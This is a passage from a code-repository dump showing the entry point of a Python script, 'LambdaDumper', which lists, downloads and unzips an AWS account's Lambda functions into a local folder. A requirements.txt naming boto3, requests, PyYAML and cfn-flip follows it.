if __name__ == "__main__": 59 | print("LambdaDumper: Script for dumping AWS Lambda Functions - Ajin Abraham") 60 | out_dir = './lambda_functions/' 61 | if not os.path.exists(out_dir): 62 | os.makedirs(out_dir) 63 | else: 64 | shutil.rmtree(out_dir) 65 | os.makedirs(out_dir) 66 | lmdump = LambdaDumper(out_dir) 67 | funcs = lmdump.get_lambda_functions() 68 | lmdump.download_functions() 69 | lmdump.unzip_files() 70 | print(f'[INFO] Finished Dumping Lambda Functions to {out_dir}') 71 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | boto3 2 | requests 3 | PyYAML 4 | cfn-flip --------------------------------------------------------------------------------